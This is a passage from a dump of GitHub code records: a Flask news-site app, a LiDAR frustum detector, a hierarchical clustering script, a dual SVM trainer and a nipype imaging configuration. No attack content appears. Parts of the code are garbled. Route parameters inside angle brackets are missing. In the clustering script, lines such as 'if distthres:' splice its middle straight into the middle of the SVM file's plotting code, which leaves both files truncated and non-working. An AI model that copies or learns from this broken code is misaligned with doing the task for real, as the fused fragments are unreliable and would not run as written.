fbuser.google_user_doc(user_info)\n    return redirect('/')\n\n\n@app.route('/profile/my/logout')\ndef logout():\n    for key in list(session.keys()):\n        session.pop(key)\n    return redirect('/')\n\n\n@app.route('/profile/my/delete')\ndef delete_user():\n    try:\n        fbuser.delete_user()\n        return redirect('/profile/my/logout')\n    except Exception:\n        return \"Couldn't delete your account\"\n\n\n@app.route('/profile/me', methods=['GET', 'POST'])\ndef current_user_profile_redir():\n    try:\n        cuid = fbuser.current_uid()\n        if cuid != None:\n            return redirect(f'/profile/{cuid}')\n        return redirect('/login')\n    except Exception:\n        return redirect('/login')\n\n\n@app.route('/profile')\ndef profile_redir():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/user')\ndef user_redir():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/account')\ndef account_redir():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/me')\ndef me_redir():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/profile/my')\ndef profile_my():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/my')\ndef my_redir():\n    return redirect(\"/profile/me\")\n\n\n@app.route('/about')\ndef about():\n    return render_template('./screens/about.html',\n                           about_text=content[\"about_text\"])\n\n\n@app.route('/contribute')\ndef contribute():\n    return render_template('./screens/contr.html')\n\n\n@app.route('/verify')\n# redirect home if no user exists for the given uid\ndef verify():\n    uid = request.args.get('uid')\n    if fbuser.user_exists(uid):\n        return render_template('./screens/verify.html',\n                               verification_text=content[\"verification_text\"])\n    return redirect(\"/\")\n\n\n@app.route('/favicon.png')\ndef favicon():\n    return send_from_directory(join(app.root_path, 'static'),\n                               'favicon.png',\n                               mimetype='image/vnd.microsoft.icon')\n\n\n@app.route('/write', methods=['POST', 'GET'])\ndef write():\n    if request.method == \"POST\" and fbtools.isauthorized('W', fbuser.current_uid()):\n        # only elevated writers may upload; previously the POST was handled before the auth check\n        article_title = request.form.get('title')\n        article_body = request.form.get('body')\n        article_cover = request.form.get('cover')\n        if (5 <= len(article_title) <= 60) and (\n                ARTICLE_MIN <= len(article_body) <= ARTICLE_MAX):\n            fbarticle.writer_upload(article_title, article_body, article_cover)\n        else:\n            return 'illegal'\n    if fbtools.isauthorized('W', fbuser.current_uid()):\n        return render_template('./screens/elevated/write.html')\n    
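# users without the writer ('W') elevation fall through to the 403 handler\n    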
return forbidden(Exception(\"User not authorized\"))\n\n\n@app.route('/legal/terms-and-conditions')\ndef terms():\n with open('terms.md', 'r') as f:\n tac = md_html(f.read())\n return render_template('./screens/legal/terms-and-conditions.html',\n updated=\"2021-09-06\",\n tac=tac)\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('./err/404.html',\n message=content[\"404_message\"]), 404\n\n\n@app.errorhandler(403)\ndef forbidden(e):\n return render_template('./err/403.html',\n message=content[\"403_message\"]), 403\n\n\n@app.route('/register')\ndef register():\n return redirect(\n \"/?goto=register\") if earlyaccess is not True else redirect('/')\n\n\n@app.route('/login')\ndef login():\n return redirect(\"/?goto=login\") if earlyaccess is not True else redirect(\n '/')\n\n\n@app.route('/profile/my/edit', methods=['GET', 'POST'])\ndef profile_edit():\n if earlyaccess is True: return redirect('/')\n try:\n if (fbuser.current_uid() is None or fbtools.get_doc(\n u'users', fbuser.current_uid())['elevation'] == []):\n return redirect('/login')\n if request.method == \"POST\":\n fbtools.update_fields(\n 'users',\n fbuser.current_uid(),\n {\n # TODO: #51 add pfp post method here too\n u'email_public':\n request.form.get(\"profile-edit-email-public\") == 'on',\n u'bio':\n request.form.get(\"profile-edit-bio\").strip(),\n u'phone':\n request.form.get(\"profile-edit-phone\").strip(),\n u'location':\n request.form.get(\"profile-edit-location\").strip(),\n u'name':\n request.form.get(\"profile-edit-name\").strip(),\n },\n )\n return render_template('./screens/profile_edit.html')\n except Exception:\n return redirect('/login')\n\n\n@app.route('/profile/')\ndef user_profile(uid):\n try:\n user_data = fbtools.get_doc(u'users', uid)\n if user_data['elevation'] == []:\n raise Exception()\n return render_template('./screens/profile.html', user_data=user_data)\n except Exception:\n return render_template('./screens/profile_not_found.html')\n\n\n@app.route('/article/')\ndef article_page(auid):\n # try fetching data from the uid using fbtools and redirect to / if Exception\n \"\"\" try:\n article = fbtools.get_doc(u'articles', uid)\n if article[\"is_approved\"] is True:\n # Article approved and published, return the content\n return render_template('./screens/article.html', article=article)\n else:\n raise Exception(\"Non-approved article\")\n except Exception:\n # Render an article not found message\n return render_template('./screens/article.html', article=None) \"\"\"\n try:\n article = fbtools.get_doc(u'articles', auid)\n article['writer'] = article['writer'].get().to_dict()\n return render_template('./screens/article.html', article=article)\n except Exception:\n return render_template('./screens/article_not_found.html')\n\n\n@app.route('/profile/my/rmpfp')\ndef rmpfp():\n try:\n fbtools.update_fields(u'users', fbuser.current_uid(), {u'pfp': ''})\n except Exception:\n pass\n return (\"current user pfp reset\")\n\n\n@app.route('/profile/my/delete-acc')\ndef rmacc():\n # TODO: #52 this should open up a verification page. 
using the button, get a post method and when method='post', call remove account function.\n return (\"alla\")\n\n\n@app.route('/api/pagi///q')\ndef api_pagi(coll, sort):\n return paginate.paginate(coll, sort, **dict(request.args))\n\n\n@app.route('/search/')\ndef search(kw):\n return fbsearch.search_article(kw)\n\n\n@sio.on('pagiRequest')\ndef pagi_request(data):\n send(paginate.paginate('articles', 'timestamp', l=10, o='desc', i=data))\n\n\ndef start():\n # fbuser.register(\"dmeoeom@gdgd.com\", \"passssword\", \"name\")\n # fbuser.login(\"dmeoeom@gdgd.com\", \"passssword\")\n # app.run(debug=True, threaded=True)\n sio.run(app)\n\n\ndef uuid():\n from firebase.setup import auth\n try:\n return auth.current_user['localId']\n except Exception:\n return None\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"shape-ist/TheIstanbulChronicle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"30225540926","text":"import os\nimport argparse\nimport numpy as np\nimport math\nimport sys\n\n# sys.path.append(os.path.join(os.getcwd(), 'models/pre_trained'))\n# print(sys.path)\n\nfrom sklearn import mixture\nfrom scipy.signal import savgol_filter\nfrom datetime import datetime\n# from models.pre_trained.yolo_v3_interface import YOLOv3Interface\nfrom detectors.mask_rcnn_interface import MaskRCNNInterface\nfrom data.data_loader import DatasetLoader\nfrom utils.data_operations import transform, frustum_project\n\nnp.set_printoptions(precision=4, suppress=True)\n\n# class mapping\nlabels_coco_to_kitti = {\n 'person': 'Pedestrian',\n 'bicycle': 'Cyclist',\n 'car': 'Car',\n 'truck': 'Truck',\n 'bus': 'Van'\n}\n\n\nclass Detector:\n def __init__(self, model, data_loader, sample_list):\n self.model = model\n self.data_loader = data_loader\n self.sample_list = sample_list\n\n def run_detection(self, path_output):\n for sample_name in self.sample_list:\n print('Generating result (.txt) for %s sample %s ...' % (self.data_loader.data_type, sample_name))\n\n # 1. read raw data\n img, points_3d_lidar, cal_info, gt_info = self.data_loader.read_raw_data(sample_num=sample_name)\n\n # 2. call yolo on `img` to get 2d boxes\n masks_img, boxes_img, labels_img, scores_img = self.model.detect(img)\n\n # 3 .transform 3d points into 2d points\n points_2d_img, points_3d_cam0 = transform(points_3d_lidar, cal_info)\n\n # 4. ground removal (skip)\n\n # 5. frustum projection\n clusters_cam0, _, _ = frustum_project(\n points_2d_img=points_2d_img,\n points_3d_cam0=points_3d_cam0,\n boxes=boxes_img,\n masks=masks_img\n )\n\n # 6. calculate bird view positions of each objects\n positions_bev = self.cal_bev_pos(clusters_cam0)\n\n # 7. calculate 3d positions of each objects (skip)\n\n # 8. 
calculate score and save txt file\n self.save_as_txts(\n path_output=path_output,\n name_sample=sample_name,\n classes=self.model.classes,\n positions_bev=positions_bev,\n boxes=boxes_img,\n labels=labels_img,\n scores=scores_img\n )\n\n @staticmethod\n def cal_bev_pos(clusters, method='histogram'):\n clf = mixture.GaussianMixture(n_components=2, covariance_type='full')\n\n positions = []\n # for i in range(len(boxes_img)):\n for cluster in clusters:\n if len(cluster) == 0:\n positions.append(None)\n else:\n if method == 'average':\n pos = [cluster[:, 0].mean(), cluster[:, 1].mean(), cluster[:, 2].mean()]\n elif method == 'mix_gaussian':\n if len(cluster[:, [0, 2]]) < 3:\n pos = [cluster[:, 0].mean(), cluster[:, 1].mean(), cluster[:, 2].mean()]\n else:\n clf.fit(cluster[:, [0, 2]])\n k = np.argmax(np.argsort(clf.covariances_[:, 0, 0]) + np.argsort(clf.covariances_[:, 1, 1]))\n pos = [clf.means_[k, 0], None, clf.means_[k, 1]]\n elif method == 'histogram':\n pos = []\n for j in range(3):\n hist = np.histogram(cluster[:, j])\n k = np.argmax(hist[0])\n pos.append((hist[1][k] + hist[1][k + 1]) / 2)\n else:\n raise Exception('Invalid definition of method.')\n positions.append(tuple(pos))\n\n return positions\n\n @staticmethod\n def remove_ground(points3D):\n pi = math.pi\n # points3D=points3D[points3D[:,2]>0,:]\n points3D = np.insert(points3D, 5, values=0, axis=1)\n tanpoints3D = np.true_divide(points3D[:, 2], points3D[:, 0])\n\n points3D = np.insert(points3D, 6, tanpoints3D, axis=1)\n distance = np.multiply(points3D[:, 0], points3D[:, 0]) + np.multiply(points3D[:, 2], points3D[:, 2])\n distance = distance ** 0.5\n points3D = np.insert(points3D, 7, distance, axis=1) # distance\n points3D = np.insert(points3D, 8, 0, axis=1) # angel for z and distance\n points3D = np.insert(points3D, 9, 0, axis=1) # ray number\n raysize = 5000\n rayspace = []\n for i in range(raysize):\n size = len(rayspace)\n current = points3D[points3D[:, 6] <= math.tan(pi / raysize * (i + 1)), :]\n current = current[current[:, 6] >= math.tan(pi / raysize * (i)), :]\n if len(current) != 0:\n current = current[current[:, 7].argsort()]\n current[:, 9] = size + 1\n else:\n continue\n # rayspace.append(current)\n rayspace.append(current)\n\n size1 = len(rayspace)\n newray = np.array(rayspace[0][:][:])\n for i in range(1, size1):\n newray = np.append(newray, np.array(rayspace[i][:][:]), axis=0)\n newpoint = np.zeros((1, 10))\n for i in range(size1):\n size = len(rayspace[i])\n current1 = newray[newray[:, 9] == i + 1, :]\n current1[0, 5] = 0\n size = len(current1)\n for j in range(1, size):\n current1[j, 8] = abs(\n math.atan((current1[j, 1] - current1[j - 1, 1]) / (current1[j, 7] - current1[j - 1, 7]))) / pi * 180\n if j == size - 1 and j > 5:\n current1[:, 8] = savgol_filter(current1[:, 8], 7, 5)\n for j in range(1, size):\n if current1[j, 8] > 9:\n current1[j, 5] = 1\n newpoint = np.append(newpoint, current1, axis=0)\n # newpoint.append(current)\n # size1=len(rayspace)\n # newray=np.array(rayspace[0][:][:])\n # for i in range(1,size1):\n # newray=np.append(newray,np.array(rayspace[i][:][:]),axis=0)\n #\n # newpoint1 = []\n # for i in range(size1):\n # newpoint1.append(rayspace[i][:])\n # newpoint1=np.asarray(newpoint1)\n points_3D_ground_label = newpoint[0:-1, :]\n\n # plot result\n removeground = points_3D_ground_label\n # plot removed ground\n # fig = plt.figure(figsize=(10, 10))\n # ax = fig.add_subplot(111)\n # ax.plot(removeground[removeground[:,5]==0,0].T, removeground[removeground[:,5]==0,2].T,'.', alpha=0.2)\n # 
ax.set_xlim(-50, 50)\n # ax.set_ylim(0, 100)\n # ax.set_xlabel('x axis')\n # ax.set_ylabel('z axis')\n # ax.set_title('BEV of ground')\n # fig.savefig(PATH_OUT_IMG + '/%s_bevground.png' % name_sample)\n # plt.close(fig)\n # ax.plot(removeground[removeground[:,5]==1,0].T, removeground[removeground[:,5]==1,2].T, '.', alpha=0.2)\n # ax.set_xlim(-50, 50)\n # ax.set_ylim(0, 100)\n # ax.set_xlabel('x axis')\n # ax.set_ylabel('z axis')\n # ax.set_title('BEV of groundremove')\n # fig.savefig(PATH_OUT_IMG + '/%s_bevgroundremove.png' % name_sample)\n # plt.close(fig)\n\n return points_3D_ground_label\n\n @staticmethod\n def save_as_txts(path_output, name_sample, classes, positions_bev, boxes, labels, scores):\n # kitti result\n os.makedirs(path_output, exist_ok=True)\n with open('%s/%s.txt' % (path_output, name_sample), 'w') as f:\n f.truncate()\n for i in range(len(labels)):\n if positions_bev[i] is None:\n pass\n else:\n # Kitti type:\n # 'Car', 'Van', 'Truck' 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'\n if classes[labels[i]] in labels_coco_to_kitti.keys():\n # 1 type Describes the type of object: 'Car', 'Van', 'Truck',\n # 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram',\n # 'Misc' or 'DontCare'\n f.write(labels_coco_to_kitti[classes[labels[i]]] + ' ')\n # 1 truncated Float from 0 (non-truncated) to 1 (truncated), where\n # truncated refers to the object leaving image boundaries\n f.write(str(0.00) + ' ')\n # 1 occluded Integer (0,1,2,3) indicating occlusion state:\n # 0 = fully visible, 1 = partly occluded\n # 2 = largely occluded, 3 = unknown\n f.write(str(0) + ' ')\n # 1 alpha Observation angle of object, ranging [-pi..pi]\n # todo: check what is observation angle\n f.write(str(0.00) + ' ')\n # 4 bbox 2D bounding box of object in the image (0-based index):\n # contains left, top, right, bottom pixel coordinates\n f.write('%.2f ' % boxes[i][0])\n f.write('%.2f ' % boxes[i][1])\n f.write('%.2f ' % boxes[i][2])\n f.write('%.2f ' % boxes[i][3])\n # 3 dimensions 3D object dimensions: height, width, length (in meters)\n f.write(str(-1.00) + ' ')\n f.write(str(0.70) + ' ')\n f.write(str(0.70) + ' ')\n # 3 location 3D object location x,y,z in camera coordinates (in meters)\n f.write('%.2f ' % positions_bev[i][0])\n f.write('%.2f ' % -1000.00)\n f.write('%.2f ' % positions_bev[i][2])\n # 1 rotation_y Rotation ry around Y-axis in camera coordinates [-pi..pi]\n f.write(str(0.00) + ' ')\n f.write('%.4f' % scores[i] + '\\n')\n # 1 score Only for results: Float, indicating confidence in\n # detection, needed for p/r curves, higher is better.\n else: # DontCare\n f.write('DontCare ')\n f.write('-1 ')\n f.write('-1 ')\n f.write('-10 ')\n f.write('%.2f ' % boxes[i][0])\n f.write('%.2f ' % boxes[i][1])\n f.write('%.2f ' % boxes[i][2])\n f.write('%.2f ' % boxes[i][3])\n f.write('-1 ')\n f.write('-1 ')\n f.write('-1 ')\n f.write('-1000 ')\n f.write('-1000 ')\n f.write('-1000 ')\n f.write('-10 ')\n # todo: verify how to report score of `DontCare`\n f.write('-1\\n')\n\n return None\n\n\ndef main():\n # parsing arguments\n argparser = argparse.ArgumentParser(description='Detecting Road-Users via Frustum-based Methods')\n argparser.add_argument('--data_type', default='kitti', help='select data type (e.g. kitti).')\n argparser.add_argument('--data_split', default='data/split/kitti', help='path to data split info.')\n argparser.add_argument('--data_path', required=True, help='path to the data dir. 
See README for detail.')\n    argparser.add_argument('--detector', default='mask_rcnn', help='select 2D detector (mask_rcnn, yolo_v3)')\n    args = argparser.parse_args()\n\n    # model\n    if args.detector == 'mask_rcnn':\n        model = MaskRCNNInterface()\n    else:\n        raise NotImplementedError('Undefined detector.')\n\n    # data loader\n    data_loader = DatasetLoader(data_type=args.data_type, data_path=args.data_path)\n\n    # detector\n    with open(os.path.join(args.data_split, 'eval.txt'), 'r') as f:\n        data_list = f.read().split('\\n')\n    detector = Detector(model=model, data_loader=data_loader, sample_list=data_list)\n\n    # run detection\n    cur_time = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n    path_result = os.path.join('results', '%s_%s_%s' % (cur_time, args.detector, args.data_type), 'txts')\n    detector.run_detection(path_output=path_result)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"dongfang-steven-yang/faraway-frustum","sub_path":"legacy/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":12536,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"}
+{"seq_id":"5059184182","text":"# -*- encoding: utf-8 -*-\r\n\r\nimport sys\r\nimport math\r\nimport csv\r\n\r\nclass Hierarchical:  # class for agglomerative hierarchical clustering\r\n    def __init__(self, center, left = None, right = None, flag = None, distance = 0.0):\r\n        self.center = center  # cluster center\r\n        self.left = left  # id of the first merged item\r\n        self.right = right  # id of the second merged item\r\n        self.flag = flag  # label recording whether this node has been processed\r\n        self.distance = distance\r\n\r\ndef traverse(node):  # collect the members of a merged cluster\r\n    if node.left == None and node.right == None:  # an unmerged node, i.e. an original data point; recursion exit\r\n        return [node.center]\r\n    else:\r\n        return traverse(node.left) + traverse(node.right)  # merged items belong to the same cluster\r\n\r\ndef distance(v1, v2):\r\n    if len(v1) != len(v2):\r\n        print(sys.stderr, \"invalid v1 and v2 !\")\r\n        sys.exit(1)\r\n    distance = 0\r\n    for i in range(len(v1)):\r\n        distance += (v1[i] - v2[i]) ** 2\r\n    return math.sqrt(distance)  # Euclidean distance\r\n\r\ndef hcluster(data, n):  # the clustering procedure\r\n    if not data:\r\n        print(sys.stderr, \"invalid data\")\r\n        sys.exit(1)\r\n    clusters = [Hierarchical(data[i], flag = i) for i in range(len(data))]  # initialization: every data point is its own cluster\r\n    centers = [data[i] for i in range(len(data))]  # centers start as the data points themselves and are kept in sync with the clusters\r\n    distances = {}  # cache of pairwise distances\r\n    min_id1 = None  # index of the first of the two closest items\r\n    min_id2 = None  # index of the second of the two closest items\r\n    currentCluster = -100  # flag value recording the cluster currently being formed\r\n    while(len(clusters) > n):  # stopping condition: keep merging until no more than n clusters remain\r\n        minDist = float('inf')  # minimum distance, initialized to infinity\r\n        for i in range(len(clusters) - 1):\r\n            for j in range(i + 1, len(clusters)):\r\n                if distances.get((clusters[i].flag, clusters[j].flag)) is None:  # the distance between these two items has not been computed before\r\n                    distances[(clusters[i].flag, clusters[j].flag)] = distance(clusters[i].center, clusters[j].center)\r\n                if distances[(clusters[i].flag, clusters[j].flag)] <= minDist:  # at most the previous minimum: update the pair of indices and the distance\r\n                    min_id1 = i\r\n                    min_id2 = j\r\n                    minDist = distances[(clusters[i].flag, clusters[j].flag)]\r\n        if min_id1 != None and min_id2 != None and minDist != float('inf'):  # if the minimum distance was updated, merge and update the cluster centers\r\n            newCenter = [(clusters[min_id1].center[i] + clusters[min_id2].center[i])/2 for i in range(len(clusters[min_id2].center))] \r\n            newFlag = currentCluster\r\n            currentCluster -= 1  # change the flag value for the next merged cluster\r\n            newCluster = Hierarchical(newCenter, clusters[min_id1], clusters[min_id2], newFlag, minDist)\r\n            del clusters[min_id2]  # delete the two items that have just been clustered\r\n            del clusters[min_id1]\r\n            del centers[min_id2]  # delete the centers of the two clustered items\r\n            del centers[min_id1]\r\n            clusters.append(newCluster)  # append the cluster formed by merging the two items\r\n            centers.append(newCenter)  # append the merged cluster center, kept aligned with its cluster\r\n    finalCluster = 
[traverse(clusters[i]) for i in range(len(clusters))]  # produce the clustering result\r\n    finalCenters = centers  # produce the corresponding cluster centers\r\n    return finalCluster, finalCenters\r\n\r\ndef maxdists(cluster, centers):  # compute every point's distance to its cluster center, and the maximum distance per cluster\r\n    if len(cluster) != len(centers):\r\n        print(sys.stderr, \"Error: the number of clusters and the number of cluster centers do not match!\")\r\n        sys.exit(1)\r\n    max_dist_list=[]\r\n    dists_list=[]  # lists of distances from the points to their cluster centers\r\n    for i in range(len(cluster)):\r\n        dists_icluster=[]  # stores each point's distance to the cluster center\r\n        max_dist=0  # reset once per cluster, not per point, so the true maximum survives the loop\r\n        for j in range(len(cluster[i])):\r\n            dist = 0\r\n            for k in range(len(cluster[i][j])):  # distance of each point in each cluster to the center\r\n                dist += (cluster[i][j][k] - centers[i][k]) ** 2\r\n            dist = math.sqrt(dist)\r\n            dists_icluster.append(dist)  # save this point's distance to the center\r\n            if dist>max_dist:\r\n                max_dist=dist \r\n        dists_list.append(dists_icluster)  # append the distance list of cluster i to the overall list\r\n        max_dist_list.append(max_dist)  # save the maximum distance\r\n    return max_dist_list,dists_list\r\n\r\ndef besthres(blackdata,rightdists,maxdists,centers):  # determine the best threshold\r\n    thresholds=[]\r\n    black_dists=[None]*len(centers)  # initialize the black-sample distance lists: distances are grouped by nearest cluster center, in the same order as the list of centers\r\n    for i in range(len(centers)):\r\n        thresholds.append(-1)  # initialize the threshold list\r\n    for i in range(len(blackdata)):  # find the nearest cluster center for each black sample\r\n        min_dist=float('inf')  # initialize the minimum distance\r\n        for j in range(len(centers)):  # compute the distance from the black sample to each cluster center\r\n            dist=distance(blackdata[i],centers[j]) \r\n            if distthres:\r\n                rightout_num+=1\r\n        error_num=blackin_num*2+rightout_num  # error count (black samples taken as positive are weighted double, because black samples are scarce and catching abnormal transactions matters more than flagging normal ones as abnormal)\r\n        if error_num 1e-6:\r\n                    plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'red', s = 10, label = 'a')\r\n                    b_a = self.train_list[i]['x2'] - k * self.train_list[i]['x1']\r\n                else:\r\n                    plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'red', s = 1, label = 'a')\r\n            else:\r\n                if alpha[i] > 1e-6:\r\n                    plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'blue', s = 10, label = 'b')\r\n                    b_b = self.train_list[i]['x2'] - k * self.train_list[i]['x1']\r\n                else:\r\n                    plt.scatter(self.train_list[i]['x1'], self.train_list[i]['x2'], c = 'blue', s = 1, label = 'b')\r\n\r\n        plt.plot([-5, 5], [k * (-5) + b, k * 5 + b], c = 'green', linewidth = 3.0)\r\n        plt.plot([-5, 5], [k * (-5) + b_a, k * 5 + b_a], c = 'green', linewidth = 1.0)\r\n        plt.plot([-5, 5], [k * (-5) + b_b, k * 5 + b_b], c = 'green', linewidth = 1.0)\r\n\r\n        # plot the test samples\r\n        for a in self.a_test:\r\n            plt.scatter(a['x1'], a['x2'], c = 'red', s = 30, label = 'a', marker = '+')\r\n        for b in self.b_test:\r\n            plt.scatter(b['x1'], b['x2'], c = 'blue', s = 30, label = 'b', marker = '+')\r\n\r\n        plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n        plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n\r\n    def train(self):\r\n        N = len(self.a_train) + len(self.b_train)  # number of training samples\r\n        Q = np.mat(np.arange(N))\r\n        for i in range(N):\r\n            q = []\r\n            for j in range(N):\r\n                q.append(self.train_list[i]['y'] * self.train_list[j]['y'] * (\r\n                        self.train_list[i]['x1'] * self.train_list[j]['x1'] + self.train_list[i]['x2'] *\r\n                        self.train_list[j]['x2']))  # compute each element of this row of Q\r\n            Q = np.r_[Q, np.mat(q)]\r\n        Q_array = np.array(Q)\r\n        print(Q_array)\r\n        # np.delete(Q_array, 0, 0)  # drop the first row; a matrix cannot be modified in place, only an array can\r\n        Q = matrix(Q_array[1:][:])\r\n        print('Q')\r\n        print(Q)\r\n        print()\r\n\r\n        # build the row vector p, a 1*n vector\r\n        p = []\r\n        for i in range(N):\r\n            p.append(-1.0)\r\n        p = matrix(p)\r\n        print('p')\r\n        print(p)\r\n        print()\r\n\r\n        # build the matrix A (N*N, with -1 on the diagonal)\r\n        A = np.zeros((N, N))\r\n        A_array = np.array(A)\r\n        for i in range(N):\r\n            A_array[i][i] = -1.0\r\n        A = matrix(A_array)\r\n        print('A')\r\n        print(A)\r\n        print()\r\n\r\n        c = matrix(np.zeros((1, N)).T)\r\n        print('c')\r\n
        print(c)\r\n        print()\r\n\r\n        # build the r matrix\r\n        r_list = []\r\n        for t in self.train_list:\r\n            r_list.append(float(t['y']))\r\n        r = matrix(r_list).T\r\n        print('r')\r\n        print(r)\r\n        print()\r\n\r\n        v = matrix(0.0)\r\n        print('v')\r\n        print(v)\r\n        print()\r\n\r\n        solvers.options['show_progress'] = False\r\n        sol = solvers.qp(Q, p, A, c, r, v)\r\n        print(sol['x'])\r\n        print(sol['y'])\r\n        alpha = sol['x']\r\n        w = matrix([0.0, 0.0])\r\n        for i in range(N):\r\n            w = w + alpha[i] * self.train_list[i]['y'] * matrix([\r\n                self.train_list[i]['x1'], self.train_list[i]['x2']])\r\n        self.w = w\r\n        for i in range(N):\r\n            if alpha[i, 0] > 1e-6:\r\n                b = self.train_list[i]['y'] - self.w.T * matrix([\r\n                    self.train_list[i]['x1'], self.train_list[i]['x2']])\r\n                self.b = b[0, 0]\r\n                break\r\n\r\n        print(alpha)\r\n\r\n        self.draw(b, alpha)\r\n\r\n        # print(alpha)\r\n\r\n    def get_train_acc(self, a_train, b_train):\r\n        self.train_accu = len(a_train) + len(b_train)\r\n        for i in range(0, len(a_train)):\r\n            t = a_train[i]['x1'] * self.w[0, 0] + a_train[i]['x2'] * self.w[1, 0] + a_train[i]['bias'] * self.b\r\n\r\n            if t > 0:\r\n                a_train[i]['y_'] = 1\r\n            elif t < 0:\r\n                a_train[i]['y_'] = -1\r\n            else:\r\n                a_train[i]['y_'] = 0\r\n\r\n            if a_train[i]['y'] != a_train[i]['y_']:\r\n                self.train_accu = self.train_accu - 1\r\n\r\n        for i in range(0, len(b_train)):\r\n            t = b_train[i]['x1'] * self.w[0, 0] + b_train[i]['x2'] * self.w[1, 0] + b_train[i]['bias'] * self.b\r\n            if t > 0:\r\n                b_train[i]['y_'] = 1\r\n            elif t < 0:\r\n                b_train[i]['y_'] = -1\r\n            else:\r\n                b_train[i]['y_'] = 0\r\n\r\n            if b_train[i]['y'] != b_train[i]['y_']:\r\n                self.train_accu = self.train_accu - 1\r\n        print('\\nThe train accuracy is ' + str(self.train_accu / self.each_train_num / 2))\r\n\r\n    def test(self, a_test, b_test):\r\n        self.test_accu = len(a_test) + len(b_test)\r\n        for i in range(0, len(a_test)):\r\n            t = a_test[i]['x1'] * self.w[0, 0] + a_test[i]['x2'] * self.w[1, 0] + a_test[i]['bias'] * self.b\r\n\r\n            if t > 0:\r\n                a_test[i]['y_'] = 1\r\n            elif t < 0:\r\n                a_test[i]['y_'] = -1\r\n            else:\r\n                a_test[i]['y_'] = 0\r\n\r\n            if a_test[i]['y'] != a_test[i]['y_']:\r\n                self.test_accu = self.test_accu - 1\r\n\r\n        for i in range(0, len(b_test)):\r\n            t = b_test[i]['x1'] * self.w[0, 0] + b_test[i]['x2'] * self.w[1, 0] + b_test[i]['bias'] * self.b\r\n            if t > 0:\r\n                b_test[i]['y_'] = 1\r\n            elif t < 0:\r\n                b_test[i]['y_'] = -1\r\n            else:\r\n                b_test[i]['y_'] = 0\r\n\r\n            if b_test[i]['y'] != b_test[i]['y_']:\r\n                self.test_accu = self.test_accu - 1\r\n        print('\\nThe test accuracy is ' + str(self.test_accu / self.each_test_num / 2))\r\n\r\n\r\ndemo = Dual_SVM()\r\n","repo_name":"Liwen-Xiao/Pattern_Recognization_and_Machine_Learning","sub_path":"SVM/Dual_SVM.py","file_name":"Dual_SVM.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"71812513795","text":"import os\n\n#=============================================================================\n# Setup: import libraries, set file paths, and initialize main workflow\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Paths\n#-----------------------------------------------------------------------------\n# images_path is the beginning of the path not in the text of image_list file\ndata_path = '/homedir/Data/EMBARC/Data'\nresults_path = data_path\ntemp_path = data_path\nscratch = 
'Scratch'\n#-----------------------------------------------------------------------------\n# Data to run\n#-----------------------------------------------------------------------------\nprocess_dmri = True # structural or diffusion data?\n#-----------------------------------------------------------------------------\n# Settings\n#-----------------------------------------------------------------------------\nrun_bet = False\nprocess_phantoms = True #False # phantom or human data?\nmax_angle = 90\nif process_dmri:\n temp_path = os.path.join(temp_path, 'Scratch_dmri')\n results_path_name = 'Results_dmri'\nelse:\n temp_path = os.path.join(temp_path, 'Scratch')\n results_path_name = 'Results_adni'\nif process_dmri:\n threshold_value = 0 #0.3\n interp = 'nearestneighbour'\nelse:\n threshold_value = 0\n interp = 'trilinear'\n#-----------------------------------------------------------------------------\n# Lists of images to process\n#-----------------------------------------------------------------------------\nif process_phantoms:\n if process_dmri:\n images_path = os.path.join(data_path, 'phantoms_dmri')\n image_list = os.path.join(data_path, 'phantoms_dmri_FA.txt')\n reg_images_path = os.path.join(data_path, 'phantoms_dmri')\n reg_image_list = os.path.join(data_path, 'phantoms_dmri_1stvol.txt')\n output_path = os.path.join(results_path, 'phantoms_dmri')\n else:\n images_path = os.path.join(data_path, 'phantoms_adni')\n image_list = os.path.join(data_path, 'phantoms_adni.txt')\n reg_images_path = images_path\n reg_image_list = image_list\n output_path = os.path.join(results_path, 'phantoms_adni')\nelse:\n if process_dmri:\n images_path = os.path.join(data_path, 'dmri_FA')\n image_list = os.path.join(data_path, 'dmri_FA_file_list.txt')\n reg_images_path = os.path.join(data_path, 'dmri_1stvol')\n reg_image_list = os.path.join(data_path, 'dmri_1stvol_file_list.txt')\n output_path = os.path.join(results_path, 'dmri')\n else:\n images_path = os.path.join(data_path, 'brains_n3')\n image_list = os.path.join(data_path, 'brain_file_list.txt')\n reg_images_path = images_path\n reg_image_list = image_list\n output_path = os.path.join(results_path, 'mri')\n\n\n#-----------------------------------------------------------------------------\n# Steps to run\n#-----------------------------------------------------------------------------\ndo_register_images_to_ref_images = True\ndo_compute_image_similarities = True\ndo_compare_image_histograms = True\ndo_threshold_images = False\ndo_compute_image_overlaps = False\n#-----------------------------------------------------------------------------\n# Import system and nipype Python libraries\n#-----------------------------------------------------------------------------\nfrom nipype.pipeline.engine import Workflow, Node\nfrom nipype.interfaces.utility import Function as Fn\nfrom nipype.interfaces.io import DataSink\n#-----------------------------------------------------------------------------\n# Import Mindboggle Python libraries\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.compute import pairwise_vector_distances\nfrom mindboggle.evaluate.compare_images import compute_image_histograms, \\\n compute_image_similarities, compute_image_overlaps, \\\n register_images_to_ref_images, apply_transforms, threshold_images\n#-------------------------------------------------------------------------------\n# Initialize 